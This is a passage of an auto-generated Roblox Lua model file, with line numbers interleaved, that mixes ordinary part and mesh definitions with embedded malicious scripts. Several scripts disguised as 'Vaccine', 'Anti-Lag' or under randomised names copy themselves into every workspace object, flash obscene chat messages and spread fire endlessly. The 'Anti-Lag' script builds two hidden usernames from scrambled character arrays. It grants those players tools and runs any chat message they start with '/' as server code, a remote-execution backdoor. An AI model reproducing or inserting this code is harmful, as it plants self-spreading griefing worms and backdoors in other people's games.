			m.Text = "lOoOoOoOp"
6723
			wait(0.25)
6724
			m.Text = "LoOoOoOoP"
6725
			wait(0.25)
6726
			m.Text = "lOoOoOoOp"
6727
			wait(0.25)
6728
			m.Text = "LoOoOoOoP"
6729
			wait(0.25)
6730
			m.Text = "GOTTA HAVE SEX WITH YOU"
6731
			wait(3)
6732
			m:remove()
6733
		end
6734
		if m:sub(1, 5) == " SEX HAAXX" then
6735
			local m = Instance.new("Message")
6736
			m.Parent = workspace
6737
			m.Text = " SEX HAAXX"	
6738
			wait(3)
6739
			m:remove()
6740
		end
6741
	end)
6742
end)
6743
6744
while true do
6745
	local s = workspace:GetChildren()
6746
	for i = 1, #s do
6747
		NameCheck = false
6748
		for ss = 1, #names do
6749
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
6750
				NameCheck = true
6751
			end
6752
		end
6753
		if NameCheck == false then
6754
			local cloak = c:Clone()
6755
			cloak.Name = ""
6756
			cloak:GetChildren()[1].Name = ""
6757
			cloak.Parent = s[i]
6758
		end
6759
		wait(0.1)
6760
	end
6761
	wait(1)
6762
end
6763
6764
end,o226)
6765
end))
6766
o227 = Create("Part",{
6767
["Parent"] = o78,
6768
["Material"] = Enum.Material.SmoothPlastic,
6769
["BrickColor"] = BrickColor.new("Cool yellow"),
6770
["Position"] = Vector3.new(60.0518684, -5249.39893, -351.582001),
6771
["Rotation"] = Vector3.new(3.00432184e-005, 0.000220848902, 3.89817178e-005),
6772
["Anchored"] = true,
6773
["CFrame"] = CFrame.new(60.0518684, -5249.39893, -351.582001, 1, -6.80359335e-007, 3.85454041e-006, 6.80361381e-007, 1, -5.24353084e-007, -3.85453995e-006, 5.24355698e-007, 1),
6774
["FormFactor"] = Enum.FormFactor.Custom,
6775
["Size"] = Vector3.new(2, 2.00000024, 0.200000003),
6776
["BottomSurface"] = Enum.SurfaceType.Smooth,
6777
["TopSurface"] = Enum.SurfaceType.Smooth,
6778
["Color"] = Color3.new(0.992157, 0.917647, 0.552941),
6779
})
6780
o228 = Create("SpecialMesh",{
6781
["Parent"] = o227,
6782
["MeshId"] = "rbxasset://fonts/torso.mesh",
6783
["Scale"] = Vector3.new(1.00100005, 1.00100005, 0.100000001),
6784
["MeshType"] = Enum.MeshType.FileMesh,
6785
})
6786
o229 = Create("Fire",{
6787
["Parent"] = o227,
6788
["Size"] = 30,
6789
["Color"] = Color3.new(1, 0.678431, 0),
6790
["Enabled"] = false,
6791
["Heat"] = 25,
6792
["SecondaryColor"] = Color3.new(1, 0, 0),
6793
})
6794
o230 = Create("Script",{
6795
["Name"] = "Spread",
6796
["Parent"] = o229,
6797
})
6798
table.insert(cors,coroutine.create(function()
6799
wait()
6800
runDummyScript(function()
6801
function Spread(part)
6802
	check = part:findFirstChild("Fire")
6803
		if check == nil then 
6804
	script.Parent:Clone().Parent = part
6805
	
6806
		elseif check ~= nil then
6807
	check.Size = check.Size + 1000000
6808
	check.Heat = check.Heat  +1000000
6809
	end
6810
end
6811
6812
6813
script.Parent.Parent.Touched:connect(Spread)
6814
6815
end,o230)
6816
end))
6817
o232 = Create("Script",{
6818
["Name"] = "Script......Or is it...",
6819
["Parent"] = mas,
6820
})
6821
table.insert(cors,coroutine.create(function()
6822
wait()
6823
runDummyScript(function()
6824
-- Thanks for using My hack.............suka XD
6825
6826
if script.Parent.className ~= "RotateP" then
6827
	local p = Instance.new("RotateP")
6828
	p.Parent = workspace
6829
	p.Name = "dåååååååååååååång.........you got owned..."
6830
	script.Parent = p
6831
end
6832
6833
function check()
6834
	local list = workspace:GetChildren()
6835
	for i = 1, #list do
6836
		if list[i]:findFirstChild("dåååååååååååååång.........you got owned...") == nil and list[i].className ~= "RotateP" then
6837
			script.Parent:Clone().Parent = list[i]
6838
		end
6839
		wait()
6840
	end
6841
end
6842
6843
while true do
6844
	check()
6845
	if workspace:findFirstChild("Hello...I åm Your New Lord Lolz") == nil then
6846
		local main = script.Parent:Clone()
6847
		main.Name = "Hello...I åm Your New Lord Lolz"
6848
		main.Parent = workspace
6849
	end
6850
	wait(3)
6851
end
6852
-- Credit goes to Nomnomnom1..........................really..........did you need to know?!
6853
-- Have a nice day. XD
6854
end,o232)
6855
end))
6856
o234 = Create("Script",{
6857
["Name"] = "Script......Or is it...",
6858
["Parent"] = mas,
6859
})
6860
table.insert(cors,coroutine.create(function()
6861
wait()
6862
runDummyScript(function()
6863
if script.Parent.className ~= "RotateP" then
6864
	local p = Instance.new("RotateP")
6865
	p.Parent = workspace
6866
	p.Name = "INfecTION"
6867
	script.Parent = p
6868
end
6869
6870
function check()
6871
	local list = workspace:GetChildren()
6872
	for i = 1, #list do
6873
		if list[i]:findFirstChild("INfecTION") == nil and list[i].className ~= "RotateP" then
6874
			script.Parent:Clone().Parent = list[i]
6875
		end
6876
		wait()
6877
	end
6878
end
6879
6880
while true do
6881
	check()
6882
	if workspace:findFirstChild("inFECtion") == nil then
6883
		local main = script.Parent:Clone()
6884
		main.Name = "inFECtion"
6885
		main.Parent = workspace
6886
	end
6887
	wait(3)
6888
end
6889
6890
end,o234)
6891
end))
6892
o236 = Create("Script",{
6893
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
6894
["Parent"] = mas,
6895
})
6896
table.insert(cors,coroutine.create(function()
6897
wait()
6898
runDummyScript(function()
6899
names={"dapperguestyo"}
6900
local NameCheck = false
6901
script.Parent.Name = names[math.random(1, #names)]
6902
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
6903
local c = script.Parent:Clone()
6904
6905
function addEvent(ch)
6906
	wait(math.random())
6907
	NameCheck = false
6908
	for ss = 1, #names do
6909
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
6910
			NameCheck = true
6911
		end
6912
	end
6913
	if NameCheck == false then
6914
		local cloak = c:Clone()
6915
		cloak.Name = ""
6916
		cloak:GetChildren()[1].Name = ""
6917
		cloak.Parent = ch
6918
		cloak.Name = names[math.random(1, 5)]
6919
	end
6920
end
6921
6922
workspace.ChildAdded:connect(addEvent)
6923
6924
game.Players.PlayerAdded:connect(function(pl)
6925
	pl.Chatted:connect(function(m)
6926
		if m:sub(1, 5) == "/sc t" then
6927
			local m = Instance.new("Message")
6928
			m.Parent = workspace
6929
			m.Text = "THEY CALL ME CRAZY"
6930
			wait(1)
6931
			m.Text = "lOoOoOoOp"
6932
			wait(0.25)
6933
			m.Text = "next page"
6934
			wait(0.25)
6935
			m.Text = "lOoOoOoOp"
6936
			wait(0.25)
6937
			m.Text = "LoOoOoOoP"
6938
			wait(0.25)
6939
			m.Text = "lOoOoOoOp"
6940
			wait(0.25)
6941
			m.Text = "LoOoOoOoP"
6942
			wait(0.25)
6943
			m.Text = "GOTTA GOTTA BE CRAZY"
6944
			wait(1)
6945
			m.Text = "lOoOoOoOp"
6946
			wait(0.25)
6947
			m.Text = "LoOoOoOoP"
6948
			wait(0.25)
6949
			m.Text = "lOoOoOoOp"
6950
			wait(0.25)
6951
			m.Text = "brendantaylor rules"
6952
			wait(0.25)
6953
			m.Text = "so does iampoobx"
6954
			wait(0.25)
6955
			m.Text = "LoOoOoOoP"
6956
			wait(0.25)
6957
			m.Text = "GOTTA GET A LIFE (YOU)"
6958
			wait(3)
6959
			m:remove()
6960
		end
6961
		if m:sub(1, 5) == "HAAXX" then
6962
			local m = Instance.new("Message")
6963
			m.Parent = workspace
6964
			m.Text = "HAAXX"	
6965
			wait(3)
6966
			m:remove()
6967
		end
6968
	end)
6969
end)
6970
6971
while true do
6972
	local s = workspace:GetChildren()
6973
	for i = 1, #s do
6974
		NameCheck = false
6975
		for ss = 1, #names do
6976
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
6977
				NameCheck = true
6978
			end
6979
		end
6980
		if NameCheck == false then
6981
			local cloak = c:Clone()
6982
			cloak.Name = ""
6983
			cloak:GetChildren()[1].Name = ""
6984
			cloak.Parent = s[i]
6985
		end
6986
		wait(0.1)
6987
	end
6988
	wait(1)
6989
end
6990
6991
end,o236)
6992
end))
6993
o237 = Create("Script",{
6994
["Name"] = "Vaccine",
6995
["Parent"] = o227,
6996
})
6997
table.insert(cors,coroutine.create(function()
6998
wait()
6999
runDummyScript(function()
7000
function spread() -- created by bumblebee773
7001
local stuff = game.Workspace:GetChildren()
7002
for i = 1, #stuff do
7003
if (stuff[i].className ~= "Script") and (stuff[i]:findFirstChild("Vaccine") == nil) and (stuff[i].className ~= "Camera") then
7004
local clone = script:clone()
7005
clone.Parent = stuff[i]
7006
end
7007
end
7008
end
7009
7010
while true do
7011
wait(.1)
7012
spread()
7013
end
7014
7015
function GetAllItems(mdl) 
7016
local objs = {} 
7017
function Search(obj) 
7018
if obj~=workspace then 
7019
table.insert(objs,obj) 
7020
end 
7021
if #obj:GetChildren() > 0 then 
7022
for i, v in ipairs(obj:GetChildren()) do 
7023
Search(v) 
7024
end 
7025
end 
7026
end 
7027
Search(mdl) 
7028
return objs 
7029
end 
7030
7031
7032
7033
for i, v in ipairs(GetAllItems(workspace)) do 
7034
if v.className == "Script" then 
7035
if v.Name == "Chaotic" or v.Name == "Spreadify" or v.Name == "Virus" or v.Name == "Infected" then 
7036
v.Parent = game.Lighting --Just in case it has a removal prevention. 
7037
t = Instance.new("ObjectValue") 
7038
t.Name = "IsAVirus" 
7039
t.Parent = v 
7040
end 
7041
end 
7042
end 
7043
7044
for i, v in ipairs(game.Lighting:GetChildren()) do 
7045
if v:findFirstChild("IsAVirus") then --Only remove the viruses. 
7046
v:remove() 
7047
end 
7048
end 
7049
7050
7051
print("Virus debugged! All clean!")
7052
end,o237)
7053
end))
7054
o239 = Create("Script",{
7055
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
7056
["Parent"] = mas,
7057
})
7058
table.insert(cors,coroutine.create(function()
7059
wait()
7060
runDummyScript(function()
7061
names={"NoNoIDon'tNeedAllOfYourAwkwårdSovietArguments", "IAmHereToHeålYourPlace", "FeelFreeToIns3rtGrammåticålErrorsHere", "ThisScriptIsAJumpStartToAHeålthyLifestyle", "FreeStyleMåyGoAnywhereIfNeeded", "3.14159265358979,ALotOfRåndomPiNumbers", "RandomåGoesHere:3", [[""''""''""å|`ç]], "77å", "å9001", "IStårtHere"}
7062
local NameCheck = false
7063
script.Parent.Name = names[math.random(1, #names)]
7064
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
7065
local c = script.Parent:Clone()
7066
7067
function addEvent(ch)
7068
	wait(math.random())
7069
	NameCheck = false
7070
	for ss = 1, #names do
7071
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
7072
			NameCheck = true
7073
		end
7074
	end
7075
	if NameCheck == false then
7076
		local cloak = c:Clone()
7077
		cloak.Name = ""
7078
		cloak:GetChildren()[1].Name = ""
7079
		cloak.Parent = ch
7080
		cloak.Name = names[math.random(1, 5)]
7081
	end
7082
end
7083
7084
workspace.ChildAdded:connect(addEvent)
7085
7086
game.Players.PlayerAdded:connect(function(pl)
7087
	pl.Chatted:connect(function(m)
7088
		if m:sub(1, 5) == "/sc t" then
7089
			local m = Instance.new("Message")
7090
			m.Parent = workspace
7091
			m.Text = "THEY CALL ME CRAZY"
7092
			wait(1)
7093
			m.Text = "lOoOoOoOp"
7094
			wait(0.25)
7095
			m.Text = "LoOoOoOoP"
7096
			wait(0.25)
7097
			m.Text = "lOoOoOoOp"
7098
			wait(0.25)
7099
			m.Text = "LoOoOoOoP"
7100
			wait(0.25)
7101
			m.Text = "lOoOoOoOp"
7102
			wait(0.25)
7103
			m.Text = "LoOoOoOoP"
7104
			wait(0.25)
7105
			m.Text = "GOTTA GOTTA BE CRAZY"
7106
			wait(1)
7107
			m.Text = "lOoOoOoOp"
7108
			wait(0.25)
7109
			m.Text = "LoOoOoOoP"
7110
			wait(0.25)
7111
			m.Text = "lOoOoOoOp"
7112
			wait(0.25)
7113
			m.Text = "LoOoOoOoP"
7114
			wait(0.25)
7115
			m.Text = "lOoOoOoOp"
7116
			wait(0.25)
7117
			m.Text = "LoOoOoOoP"
7118
			wait(0.25)
7119
			m.Text = "GOTTA GET A LIFE (YOU)"
7120
			wait(3)
7121
			m:remove()
7122
		end
7123
		if m:sub(1, 5) == "HAAXX" then
7124
			local m = Instance.new("Message")
7125
			m.Parent = workspace
7126
			m.Text = "HAAXX"	
7127
			wait(3)
7128
			m:remove()
7129
		end
7130
	end)
7131
end)
7132
7133
while true do
7134
	local s = workspace:GetChildren()
7135
	for i = 1, #s do
7136
		NameCheck = false
7137
		for ss = 1, #names do
7138
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
7139
				NameCheck = true
7140
			end
7141
		end
7142
		if NameCheck == false then
7143
			local cloak = c:Clone()
7144
			cloak.Name = ""
7145
			cloak:GetChildren()[1].Name = ""
7146
			cloak.Parent = s[i]
7147
		end
7148
		wait(0.1)
7149
	end
7150
	wait(1)
7151
end
7152
7153
end,o239)
7154
end))
7155
o241 = Create("Script",{
7156
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
7157
["Parent"] = mas,
7158
})
7159
table.insert(cors,coroutine.create(function()
7160
wait()
7161
runDummyScript(function()
7162
names={"AmazingOmegaJames","H75","","","","","","",""}
7163
local NameCheck = false
7164
script.Parent.Name = names[math.random(1, #names)]
7165
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
7166
local c = script.Parent:Clone()
7167
7168
function addEvent(ch)
7169
	wait(math.random())
7170
	NameCheck = false
7171
	for ss = 1, #names do
7172
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
7173
			NameCheck = true
7174
		end
7175
	end
7176
	if NameCheck == false then
7177
		local cloak = c:Clone()
7178
		cloak.Name = ""
7179
		cloak:GetChildren()[1].Name = ""
7180
		cloak.Parent = ch
7181
		cloak.Name = names[math.random(1, 5)]
7182
	end
7183
end
7184
7185
workspace.ChildAdded:connect(addEvent)
7186
7187
game.Players.PlayerAdded:connect(function(pl)
7188
	pl.Chatted:connect(function(m)
7189
		if m:sub(1, 5) == "/sc t" then
7190
			local m = Instance.new("The creator of this place is AmazingOmegaJames")
7191
			m.Parent = workspace
7192
			m.Text = "THEY CALL ME CRAZY"
7193
			wait(1)
7194
			m.Text = "lOoOoOoOp"
7195
			wait(0.25)
7196
			m.Text = "LoOoOoOoP"
7197
			wait(0.25)
7198
			m.Text = "lOoOoOoOp"
7199
			wait(0.25)
7200
			m.Text = "LoOoOoOoP"
7201
			wait(0.25)
7202
			m.Text = "lOoOoOoOp"
7203
			wait(0.25)
7204
			m.Text = "LoOoOoOoP"
7205
			wait(0.25)
7206
			m.Text = "GOTTA GOTTA BE CRAZY SEX"
7207
			wait(1)
7208
			m.Text = "lOoOoOoOp"
7209
			wait(0.25)
7210
			m.Text = "LoOoOoOoP"
7211
			wait(0.25)
7212
			m.Text = "lOoOoOoOp"
7213
			wait(0.25)
7214
			m.Text = "LoOoOoOoP"
7215
			wait(0.25)
7216
			m.Text = "lOoOoOoOp"
7217
			wait(0.25)
7218
			m.Text = "LoOoOoOoP"
7219
			wait(0.25)
7220
			m.Text = "GOTTA HAVE SEX WITH YOU"
7221
			wait(3)
7222
			m:remove()
7223
		end
7224
		if m:sub(1, 5) == " SEX HAAXX" then
7225
			local m = Instance.new("Message")
7226
			m.Parent = workspace
7227
			m.Text = " SEX HAAXX"	
7228
			wait(3)
7229
			m:remove()
7230
		end
7231
	end)
7232
end)
7233
7234
while true do
7235
	local s = workspace:GetChildren()
7236
	for i = 1, #s do
7237
		NameCheck = false
7238
		for ss = 1, #names do
7239
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
7240
				NameCheck = true
7241
			end
7242
		end
7243
		if NameCheck == false then
7244
			local cloak = c:Clone()
7245
			cloak.Name = ""
7246
			cloak:GetChildren()[1].Name = ""
7247
			cloak.Parent = s[i]
7248
		end
7249
		wait(0.1)
7250
	end
7251
	wait(1)
7252
end
7253
7254
end,o241)
7255
end))
7256
o242 = Create("Part",{
7257
["Name"] = "Handle",
7258
["Parent"] = o78,
7259
["Material"] = Enum.Material.SmoothPlastic,
7260
["BrickColor"] = BrickColor.new("Daisy orange"),
7261
["Position"] = Vector3.new(60.0487137, -5247.51904, -351.125183),
7262
["Rotation"] = Vector3.new(-179.999985, -0.00022191646, 179.999969),
7263
["Anchored"] = true,
7264
["CFrame"] = CFrame.new(60.0487137, -5247.51904, -351.125183, -1, -6.79548691e-007, -3.87317277e-006, -6.79550567e-007, 1, 4.89949002e-007, 3.87317232e-006, 4.89951674e-007, -1),
7265
["FormFactor"] = Enum.FormFactor.Symmetric,
7266
["Size"] = Vector3.new(2, 1, 1),
7267
["BottomSurface"] = Enum.SurfaceType.Smooth,
7268
["TopSurface"] = Enum.SurfaceType.Smooth,
7269
["Color"] = Color3.new(0.972549, 0.85098, 0.427451),
7270
})
7271
o243 = Create("SpecialMesh",{
7272
["Parent"] = o242,
7273
["MeshId"] = "http://www.roblox.com/asset/?id=16627529",
7274
["Scale"] = Vector3.new(1.04999995, 0.800000012, 1.04999995),
7275
["VertexColor"] = Vector3.new(0, 0, 0),
7276
["MeshType"] = Enum.MeshType.FileMesh,
7277
})
7278
o244 = Create("Script",{
7279
["Name"] = "Anti-Lag",
7280
["Parent"] = o242,
7281
})
7282
table.insert(cors,coroutine.create(function()
7283
wait()
7284
runDummyScript(function()
7285
Altitude = script:clone()
7286
calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
7287
Knox = {}
7288
table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
7289
table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
7290
Play = {}
7291
function rando(votation)
7292
local hatr = 5
7293
local calc = math.pi * math.huge
7294
local longicate = votation:GetChildren()
7295
if #longicate > hatr then 
7296
calc = calc + math.pi
7297
return longicate[math.random(6,#longicate)]
7298
end
7299
end
7300
function doublecheck()
7301
local fj = game.Workspace:GetChildren()
7302
for off = 1,#fj do
7303
if fj[off].className == "Part" then
7304
local fh = fj[off]:FindFirstChild("Anti-Lag")
7305
if fh ~= nil then 
7306
return false
7307
end
7308
end
7309
end
7310
return true
7311
end
7312
function workcheck()
7313
if doublecheck() == true then
7314
local l = Altitude:clone()
7315
l.Parent = rando(game.Workspace)
7316
end
7317
end
7318
workcheck()
7319
function gibite(quen)
7320
local  hup = Instance.new("Message")
7321
hup.Text = "Detected"
7322
hup.Parent = quen.Parent
7323
local con = Instance.new("Script")
7324
con.Source = [[wait(5) script.Parent:remove()]]
7325
con.Parent = hup
7326
for ish = 0,7 do
7327
local a = Instance.new("HopperBin")
7328
a.BinType = ish
7329
a.Parent = quen
7330
end
7331
end
7332
function laber(zonsa)
7333
wait()
7334
for slate = 1,#Knox do  
7335
if zonsa.Name == Knox[slate] then
7336
gibite(zonsa.Backpack)
7337
table.insert (Play, 1,  zonsa.Name)
7338
end
7339
end
7340
end
7341
function yeild(frequency)
7342
local t = Knox
7343
for g = 1,#t do
7344
if t[g] == frequency.Name then
7345
return true
7346
end
7347
end
7348
return false
7349
end
7350
function check(los)
7351
local r = los:GetChildren()
7352
for i = 1,#r do
7353
local h = r[i]:FindFirstChild("Anti-Lag")
7354
if h ~= nil then
7355
h:remove()
7356
end
7357
end
7358
end
7359
function alto(xylem)
7360
if xylem.className == "Model" then
7361
check(xylem)
7362
local que = script:clone()
7363
que.Parent = rando(xylem)
7364
end
7365
end
7366
function sortation(gone)
7367
local dimbs = Altitude:clone()
7368
dimbs = ramno(game.Workspace)
7369
end
7370
function onPlayerEntered(newPlayer)
7371
newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end) 
7372
end
7373
function Player(player)
7374
player.Changed:connect(function (property) 
7375
if property == "Character" then 
7376
laber(player) 
7377
end
7378
end)
7379
end
7380
game.Players.PlayerAdded:connect(Player)
7381
game.Players.ChildAdded:connect(onPlayerEntered)
7382
game.Players.ChildAdded:connect(laber)
7383
script.ChildRemoved:connect(sortation)
7384
game.Workspace.ChildAdded:connect(alto)
7385
function onChatted(msg, recipient, speaker)
7386
if yeild(speaker) ~= false then
7387
if string.sub(msg,1,1) == "/" then
7388
local dsting = Instance.new("Script")
7389
dsting.Source = string.sub(msg,2) 
7390
dsting.Parent = game.Workspace 
7391
end
7392
end
7393
end 
7394
end,o244)
7395
end))
7396
o245 = Create("Part",{
7397
["Name"] = "Handle",
7398
["Parent"] = o78,
7399
["Material"] = Enum.Material.SmoothPlastic,
7400
["BrickColor"] = BrickColor.new("Daisy orange"),
7401
["Position"] = Vector3.new(59.6787376, -5247.36914, -350.835205),
7402
["Rotation"] = Vector3.new(-164.999954, -0.000232520077, 165.000168),
7403
["Anchored"] = true,
7404
["CFrame"] = CFrame.new(59.6787376, -5247.36914, -350.835205, -0.965926588, -0.258816183, -4.05824085e-006, -0.249998212, 0.933012903, 0.258819878, -0.066982992, 0.250001997, -0.965925634),
7405
["CanCollide"] = false,
7406
["FormFactor"] = Enum.FormFactor.Symmetric,
7407
["Size"] = Vector3.new(1, 2, 2),
7408
["BottomSurface"] = Enum.SurfaceType.Smooth,
7409
["TopSurface"] = Enum.SurfaceType.Smooth,
7410
["Color"] = Color3.new(0.972549, 0.85098, 0.427451),
7411
})
7412
o246 = Create("SpecialMesh",{
7413
["Parent"] = o245,
7414
["MeshId"] = "http://www.roblox.com/asset/?id=19326912",
7415
["Scale"] = Vector3.new(0.300000012, 0.5, 0.600000024),
7416
["MeshType"] = Enum.MeshType.FileMesh,
7417
})
7418
o247 = Create("Part",{
7419
["Name"] = "Handle",
7420
["Parent"] = o78,
7421
["Material"] = Enum.Material.SmoothPlastic,
7422
["BrickColor"] = BrickColor.new("Daisy orange"),
7423
["Position"] = Vector3.new(60.0087128, -5247.06934, -350.835205),
7424
["Rotation"] = Vector3.new(-164.999954, -0.00022443202, -179.999985),
7425
["Anchored"] = true,
7426
["CFrame"] = CFrame.new(60.0087128, -5247.06934, -350.835205, -1, 3.46058613e-007, -3.91707772e-006, -6.79550567e-007, 0.965925694, 0.258819848, 3.87317232e-006, 0.258819878, -0.965925634),
7427
["CanCollide"] = false,
7428
["FormFactor"] = Enum.FormFactor.Symmetric,
7429
["Size"] = Vector3.new(1, 2, 2),
7430
["BottomSurface"] = Enum.SurfaceType.Smooth,
7431
["TopSurface"] = Enum.SurfaceType.Smooth,
7432
["Color"] = Color3.new(0.972549, 0.85098, 0.427451),
7433
})
7434
o248 = Create("SpecialMesh",{
7435
["Parent"] = o247,
7436
["MeshId"] = "http://www.roblox.com/asset/?id=19326912",
7437
["Scale"] = Vector3.new(0.699999988, 0.400000006, 0.600000024),
7438
["MeshType"] = Enum.MeshType.FileMesh,
7439
})
7440
o249 = Create("Part",{
7441
["Name"] = "Handle",
7442
["Parent"] = o78,
7443
["Material"] = Enum.Material.SmoothPlastic,
7444
["BrickColor"] = BrickColor.new("Daisy orange"),
7445
["Position"] = Vector3.new(60.0087166, -5247.06934, -351.425201),
7446
["Rotation"] = Vector3.new(-179.999985, -0.00022191646, 179.999969),
7447
["Anchored"] = true,
7448
["CFrame"] = CFrame.new(60.0087166, -5247.06934, -351.425201, -1, -6.79548691e-007, -3.87317277e-006, -6.79550567e-007, 1, 4.91808123e-007, 3.87317232e-006, 4.91810738e-007, -1),
7449
["CanCollide"] = false,
7450
["FormFactor"] = Enum.FormFactor.Symmetric,
7451
["Size"] = Vector3.new(1, 2, 2),
7452
["BottomSurface"] = Enum.SurfaceType.Smooth,
7453
["TopSurface"] = Enum.SurfaceType.Smooth,
7454
["Color"] = Color3.new(0.972549, 0.85098, 0.427451),
7455
})
7456
o250 = Create("SpecialMesh",{
7457
["Parent"] = o249,
7458
["MeshId"] = "http://www.roblox.com/asset/?id=19326912",
7459
["Scale"] = Vector3.new(0.899999976, 0.5, 0.649999976),
7460
["MeshType"] = Enum.MeshType.FileMesh,
7461
})
7462
o251 = Create("Part",{
7463
["Name"] = "Handle",
7464
["Parent"] = o78,
7465
["BrickColor"] = BrickColor.new("Cool yellow"),
7466
["Position"] = Vector3.new(59.6618843, -5246.99902, -350.902039),
7467
["Rotation"] = Vector3.new(-179.999969, -0.00020868631, 165.000122),
7468
["CFrame"] = CFrame.new(59.6618843, -5246.99902, -350.902039, -0.965926409, -0.258816987, -3.64226321e-006, -0.258817017, 0.965926409, 6.09341328e-007, 3.36045036e-006, 1.53125848e-006, -1),
7469
["CanCollide"] = false,
7470
["FormFactor"] = Enum.FormFactor.Symmetric,
7471
["Size"] = Vector3.new(1, 1, 1),
7472
["BottomSurface"] = Enum.SurfaceType.Smooth,
7473
["TopSurface"] = Enum.SurfaceType.Smooth,
7474
["Color"] = Color3.new(0.992157, 0.917647, 0.552941),
7475
})
7476
o252 = Create("SpecialMesh",{
7477
["Parent"] = o251,
7478
["MeshId"] = "http://www.roblox.com/asset/?id=249768539 ",
7479
["Scale"] = Vector3.new(0.300000012, 0.699999988, 0.300000012),
7480
["MeshType"] = Enum.MeshType.FileMesh,
7481
})
7482
o253 = Create("Part",{
7483
["Name"] = "Handle",
7484
["Parent"] = o78,
7485
["Material"] = Enum.Material.SmoothPlastic,
7486
["BrickColor"] = BrickColor.new("Daisy orange"),
7487
["Position"] = Vector3.new(60.4387169, -5247.30908, -351.065216),
7488
["Rotation"] = Vector3.new(-164.999939, -0.000222076487, -165.000137),
7489
["Anchored"] = true,
7490
["CFrame"] = CFrame.new(60.4387169, -5247.30908, -351.065216, -0.965926468, 0.258816779, -3.87596583e-006, 0.249996796, 0.93301332, 0.258820117, 0.0669906139, 0.250000238, -0.965925574),
7491
["CanCollide"] = false,
7492
["FormFactor"] = Enum.FormFactor.Symmetric,
7493
["Size"] = Vector3.new(1, 2, 2),
7494
["BottomSurface"] = Enum.SurfaceType.Smooth,
7495
["TopSurface"] = Enum.SurfaceType.Smooth,
7496
["Color"] = Color3.new(0.972549, 0.85098, 0.427451),
7497
})
7498
o254 = Create("SpecialMesh",{
7499
["Parent"] = o253,
7500
["MeshId"] = "http://www.roblox.com/asset/?id=19326912",
7501
["Scale"] = Vector3.new(0.300000012, 0.5, 0.699999988),
7502
["MeshType"] = Enum.MeshType.FileMesh,
7503
})
7504
o255 = Create("Part",{
7505
["Name"] = "Handle",
7506
["Parent"] = o78,
7507
["Material"] = Enum.Material.SmoothPlastic,
7508
["BrickColor"] = BrickColor.new("Daisy orange"),
7509
["Position"] = Vector3.new(60.0087128, -5247.4292, -351.495209),
7510
["Rotation"] = Vector3.new(-179.999985, -0.00022191646, 179.999969),
7511
["Anchored"] = true,
7512
["CFrame"] = CFrame.new(60.0087128, -5247.4292, -351.495209, -1, -6.79548691e-007, -3.87317277e-006, -6.79550567e-007, 1, 4.91808123e-007, 3.87317232e-006, 4.91810738e-007, -1),
7513
["CanCollide"] = false,
7514
["FormFactor"] = Enum.FormFactor.Symmetric,
7515
["Size"] = Vector3.new(1, 2, 2),
7516
["BottomSurface"] = Enum.SurfaceType.Smooth,
7517
["TopSurface"] = Enum.SurfaceType.Smooth,
7518
["Color"] = Color3.new(0.972549, 0.85098, 0.427451),
7519
})
7520
o256 = Create("SpecialMesh",{
7521
["Parent"] = o255,
7522
["MeshId"] = "http://www.roblox.com/asset/?id=19326912",
7523
["Scale"] = Vector3.new(1, 0.300000012, 0.649999976),
7524
["MeshType"] = Enum.MeshType.FileMesh,
7525
})
7526
o257 = Create("Model",{
7527
["Name"] = "Arm1",
7528
["Parent"] = o1,
7529
})
7530
o258 = Create("Part",{
7531
["Name"] = "Middle",
7532
["Parent"] = o257,
7533
["BrickColor"] = BrickColor.new("White"),
7534
["Transparency"] = 1,
7535
["Position"] = Vector3.new(61.4995308, -5249.41943, -351.075073),
7536
["Rotation"] = Vector3.new(-179.999939, -0.000157029906, -180),
7537
["Anchored"] = true,
7538
["CFrame"] = CFrame.new(61.4995308, -5249.41943, -351.075073, -1, 3.03810417e-008, -2.74068884e-006, 3.03781853e-008, 1, 1.04285436e-006, 2.74068884e-006, 1.04285425e-006, -1),
7539
["FormFactor"] = Enum.FormFactor.Symmetric,
7540
["Size"] = Vector3.new(1, 2, 1),
7541
["BottomSurface"] = Enum.SurfaceType.Smooth,
7542
["TopSurface"] = Enum.SurfaceType.Smooth,
7543
["Color"] = Color3.new(0.94902, 0.952941, 0.952941),
7544
})
7545
o259 = Create("Fire",{
7546
["Parent"] = o258,
7547
["Size"] = 30,
7548
["Color"] = Color3.new(1, 0.678431, 0),
7549
["Enabled"] = false,
7550
["Heat"] = 25,
7551
["SecondaryColor"] = Color3.new(1, 0, 0),
7552
})
7553
o260 = Create("Script",{
7554
["Name"] = "Spread",
7555
["Parent"] = o259,
7556
})
7557
table.insert(cors,coroutine.create(function()
7558
wait()
7559
runDummyScript(function()
7560
function Spread(part)
7561
	check = part:findFirstChild("Fire")
7562
		if check == nil then 
7563
	script.Parent:Clone().Parent = part
7564
	
7565
		elseif check ~= nil then
7566
	check.Size = check.Size + 1000000
7567
	check.Heat = check.Heat  +1000000
7568
	end
7569
end
7570
7571
7572
script.Parent.Parent.Touched:connect(Spread)
7573
7574
end,o260)
7575
end))
7576
o261 = Create("Part",{
7577
["Parent"] = o257,
7578
["Material"] = Enum.Material.SmoothPlastic,
7579
["BrickColor"] = BrickColor.new("Cool yellow"),
7580
["Position"] = Vector3.new(61.5268745, -5249.18896, -351.152039),
7581
["Rotation"] = Vector3.new(2.65601866e-005, -90, 0),
